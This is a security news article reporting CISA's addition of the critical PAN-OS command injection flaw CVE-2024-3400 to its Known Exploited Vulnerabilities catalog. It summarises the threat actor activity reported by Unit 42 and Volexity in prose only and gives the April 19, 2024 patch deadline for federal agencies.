CISA Adds Critical Palo Alto Networks PAN-OS Flaw to Known Exploited Vulnerabilities Catalog

April 15, 2024

The Cybersecurity and Infrastructure Security Agency (CISA) has added the critical command injection flaw in Palo Alto Networks PAN-OS software, known as CVE-2024-3400, to its Known Exploited Vulnerabilities catalog. This vulnerability, with a maximum CVSS score of 10.0, permits an unauthorized attacker to run arbitrary code with root access on impacted firewalls. The affected firewalls include PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 configured with GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled.

Palo Alto Networks and Unit 42 have been investigating the CVE-2024-3400 PAN-OS flaw and found that unknown threat actors have been exploiting it since March 26, 2024. The researchers are monitoring this cluster of activity, conducted by an unidentified threat actor, under the name Operation MidnightEclipse. “Palo Alto Networks is aware of malicious exploitation of this issue. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse, as we assess with high confidence that known exploitation we’ve analyzed thus far is limited to a single threat actor.” reads the report. “We also assess that additional threat actors may attempt exploitation in the future.”

Upon successful exploitation, the threat actor was seen creating a cronjob that would run every minute to access commands hosted on an external server that would execute via bash. The researchers were unable to access the commands executed by the attackers, but they suspect threat actors tried to deploy a second Python-based backdoor on the vulnerable devices. This second Python backdoor has been referred to as UPSTYLE by cybersecurity firm Volexity.

The threat actor, tracked as UTA0218 by Volexity, remotely exploited the firewall device to establish a reverse shell and install additional tools. Their main goal was to extract configuration data from the devices and then use it as a foothold to expand laterally within the targeted organizations. “During its investigation, Volexity observed that UTA0218 attempted to install a custom Python backdoor, which Volexity calls UPSTYLE, on the firewall. The UPSTYLE backdoor allows the attacker to execute additional commands on the device via specially crafted network requests. Details on this backdoor are included further on in this report.” reads the report published by Volexity.

As per Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, federal agencies are required to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. Experts also advise private organizations to review the Catalog and address the vulnerabilities in their infrastructure. CISA has set a deadline of April 19, 2024, for federal agencies to fix this vulnerability.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.